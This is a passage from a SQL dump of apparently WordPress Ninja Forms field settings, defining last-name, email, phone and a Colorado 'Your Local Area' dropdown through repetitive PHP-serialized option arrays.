Name'),(3773,122,'label_pos','above','label_pos','above'),(3774,122,'mask','','mask',''),(3775,122,'datepicker','0','datepicker','0'),(3776,122,'first_name','0','first_name','0'),(3777,122,'from_name','0','from_name','0'),(3778,122,'user_info_field_group','1','user_info_field_group','1'),(3779,122,'show_help','0','show_help','0'),(3780,122,'help_text','','help_text',''),(3781,122,'calc_auto_include','0','calc_auto_include','0'),(3782,122,'calc_option','0','calc_option','0'),(3783,122,'placeholder','','placeholder',''),(3784,122,'user_address_1','','user_address_1',''),(3785,122,'user_address_2','','user_address_2',''),(3786,122,'user_city','','user_city',''),(3787,122,'user_zip','','user_zip',''),(3788,122,'user_phone','','user_phone',''),(3789,122,'user_email','','user_email',''),(3790,122,'disable_input','0','disable_input','0'),(3791,122,'input_limit','','input_limit',''),(3792,122,'input_limit_type','char','input_limit_type','char'),(3793,122,'input_limit_msg','','input_limit_msg',''),(3794,122,'user_state','0','user_state','0'),(3795,122,'autocomplete_off','0','autocomplete_off','0'),(3796,122,'num_sort','0','num_sort','0'),(3797,122,'admin_label','','admin_label',''),(3798,122,'user_info_field_group_name','','user_info_field_group_name',''),(3799,122,'user_info_field_group_custom','','user_info_field_group_custom',''),(3800,122,'show_desc','0','show_desc','0'),(3801,122,'desc_pos','none','desc_pos','none'),(3802,122,'desc_text','','desc_text',''),(3803,122,'element_class','','element_class',''),(3804,122,'required','1','required','1'),(3805,122,'key','lastname_34','key','lastname_34'),(3806,122,'default','','default',''),(3807,122,'container_class','one-half','container_class','one-half'),(3808,122,'parent_id','12','parent_id','12'),(3809,123,'objectType','Field','objectType','Field'),(3810,123,'objectDomain','fields','objectDomain','fields'),(3811,123,'editActive','','editActive',''),(3812,123,'order','4','order','4'),(3813,123,'type','email','type','email'),(3814,123,'def_id','14','def_id','14'),(3815,123,'label','Email','label','Email'),(3816,123,'label_pos','above','label_pos','above'),(3817,123,'mask','','mask',''),(3818,123,'datepicker','0','datepicker','0'),(3819,123,'first_name','0','first_name','0'),(3820,123,'last_name','0','last_name','0'),(3821,123,'from_name','0','from_name','0'),(3822,123,'user_address_1','0','user_address_1','0'),(3823,123,'user_address_2','0','user_address_2','0'),(3824,123,'user_city','0','user_city','0'),(3825,123,'user_zip','0','user_zip','0'),(3826,123,'user_phone','0','user_phone','0'),(3827,123,'user_info_field_group','1','user_info_field_group','1'),(3828,123,'show_help','0','show_help','0'),(3829,123,'help_text','','help_text',''),(3830,123,'calc_auto_include','0','calc_auto_include','0'),(3831,123,'calc_option','0','calc_option','0'),(3832,123,'placeholder','','placeholder',''),(3833,123,'disable_input','0','disable_input','0'),(3834,123,'input_limit','','input_limit',''),(3835,123,'input_limit_type','char','input_limit_type','char'),(3836,123,'input_limit_msg','','input_limit_msg',''),(3837,123,'user_state','0','user_state','0'),(3838,123,'autocomplete_off','0','autocomplete_off','0'),(3839,123,'num_sort','0','num_sort','0'),(3840,123,'admin_label','','admin_label',''),(3841,123,'user_info_field_group_name','','user_info_field_group_name',''),(3842,123,'user_info_field_group_custom','','user_info_field_group_custom',''),(3843,123,'show_desc','0','show_desc','0'),(3844,123,'desc_pos','none','desc_pos','none'),(3845,123,'desc_text','','desc_text',''),(3846,123,'element_class','','element_class',''),(3847,123,'required','1','required','1'),(3848,123,'key','email_35','key','email_35'),(3849,123,'default','','default',''),(3850,123,'container_class','one-half first','container_class','one-half first'),(3851,123,'parent_id','12','parent_id','12'),(3852,124,'objectType','Field','objectType','Field'),(3853,124,'objectDomain','fields','objectDomain','fields'),(3854,124,'editActive','','editActive',''),(3855,124,'order','5','order','5'),(3856,124,'type','phone','type','phone'),(3857,124,'def_id','15','def_id','15'),(3858,124,'label','Phone','label','Phone'),(3859,124,'label_pos','above','label_pos','above'),(3860,124,'mask','(999) 999-9999','mask','(999) 999-9999'),(3861,124,'datepicker','0','datepicker','0'),(3862,124,'first_name','0','first_name','0'),(3863,124,'last_name','0','last_name','0'),(3864,124,'from_name','0','from_name','0'),(3865,124,'user_address_1','0','user_address_1','0'),(3866,124,'user_address_2','0','user_address_2','0'),(3867,124,'user_city','0','user_city','0'),(3868,124,'user_zip','0','user_zip','0'),(3869,124,'user_email','0','user_email','0'),(3870,124,'user_info_field_group','1','user_info_field_group','1'),(3871,124,'show_help','0','show_help','0'),(3872,124,'help_text','','help_text',''),(3873,124,'calc_auto_include','0','calc_auto_include','0'),(3874,124,'calc_option','0','calc_option','0'),(3875,124,'placeholder','','placeholder',''),(3876,124,'disable_input','0','disable_input','0'),(3877,124,'input_limit','','input_limit',''),(3878,124,'input_limit_type','char','input_limit_type','char'),(3879,124,'input_limit_msg','','input_limit_msg',''),(3880,124,'user_state','0','user_state','0'),(3881,124,'autocomplete_off','0','autocomplete_off','0'),(3882,124,'num_sort','0','num_sort','0'),(3883,124,'admin_label','','admin_label',''),(3884,124,'user_info_field_group_name','','user_info_field_group_name',''),(3885,124,'user_info_field_group_custom','','user_info_field_group_custom',''),(3886,124,'show_desc','0','show_desc','0'),(3887,124,'desc_pos','none','desc_pos','none'),(3888,124,'desc_text','','desc_text',''),(3889,124,'element_class','','element_class',''),(3890,124,'required','1','required','1'),(3891,124,'key','phone_36','key','phone_36'),(3892,124,'default','','default',''),(3893,124,'container_class','one-half','container_class','one-half'),(3894,124,'manual_key','','manual_key',''),(3895,124,'custom_mask','','custom_mask',''),(3896,124,'parent_id','12','parent_id','12'),(3897,125,'objectType','Field','objectType','Field'),(3898,125,'objectDomain','fields','objectDomain','fields'),(3899,125,'editActive','','editActive',''),(3900,125,'order','6','order','6'),(3901,125,'type','listselect','type','listselect'),(3902,125,'label','Your Local Area','label','Your Local Area'),(3903,125,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3904,125,'label_pos','above','label_pos','above'),(3905,125,'list_type','dropdown','list_type','dropdown'),(3906,125,'multi_size','5','multi_size','5'),(3907,125,'list_show_value','1','list_show_value','1'),(3908,125,'list','a:0:{}','list','a:0:{}'),(3909,125,'user_info_field_group','','user_info_field_group',''),(3910,125,'calc_auto_include','0','calc_auto_include','0'),(3911,125,'user_state','0','user_state','0'),(3912,125,'num_sort','0','num_sort','0'),(3913,125,'admin_label','','admin_label',''),(3914,125,'show_help','0','show_help','0'),(3915,125,'help_text','','help_text',''),(3916,125,'show_desc','0','show_desc','0'),(3917,125,'desc_pos','none','desc_pos','none'),(3918,125,'desc_text','','desc_text',''),(3919,125,'element_class','','element_class',''),(3920,125,'required','1','required','1'),(3921,125,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 